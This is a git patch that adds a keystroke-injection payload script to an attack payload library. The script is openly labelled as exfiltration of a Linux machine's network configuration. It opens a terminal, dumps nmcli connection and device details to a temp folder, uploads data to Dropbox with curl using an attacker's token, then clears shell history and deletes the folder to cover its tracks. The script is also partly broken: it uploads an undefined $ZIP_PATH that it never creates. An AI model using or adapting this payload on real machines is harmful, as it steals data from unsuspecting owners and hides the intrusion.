From 9545dcf30613ff6d6e58e129fa390ef49fe0a3dd Mon Sep 17 00:00:00 2001
From: Alessandro <alessandrogreco@autistici.org>
Date: Mon, 13 Mar 2023 09:23:29 +0100
Subject: [PATCH] Create payload.txt

---
 .../payload.txt                               | 76 +++++++++++++++++++
 1 file changed, 76 insertions(+)
 create mode 100644 payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt

diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
new file mode 100644
index 0000000..36d0c33
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -0,0 +1,76 @@
+
+REM ##########################################################
+REM #                                                        |
+REM # Title        : Exfiltrate Linux Network Configuration  |
+REM # Author       : Aleff                                   |
+REM # Version      : 1.0                                     |
+REM # Category     : Exfiltration, Execution                 |
+REM # Target       : Linux                                   |
+REM #                                                        |
+REM ##########################################################
+
+REM Requirements:
+REM     - Internet Connection
+REM     - Dropbox Account
+REM     - - DROPBOX_ACCESS_TOKEN
+
+DELAY 1000
+CTRL-ALT t
+
+DELAY 2000
+REM Required: Set here your Dropbox access TOKEN
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+REM DELAY 500
+REM STRING USER_NAME=$(whoami)
+REM ENTER
+
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+DELAY 500
+STRING NAME="$RANDOM.zip"
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
+ENTER
+
+REM Delay for zipping operation, it depends by computer power and folder directory
+DELAY 3000
+
+STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
+ENTER
+DELAY 1000
+
+STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
+ENTER
+DELAY 1000
+
+STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
+ENTER
+DELAY 1000
+
+STRING DROPBOX_FOLDER="/$NAME"
+ENTER
+DELAY 500
+
+DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+STRING curl -X POST
+STRING DROPBOX_API_CONST
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+DELAY 2000
+STRING history -c
+ENTER
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER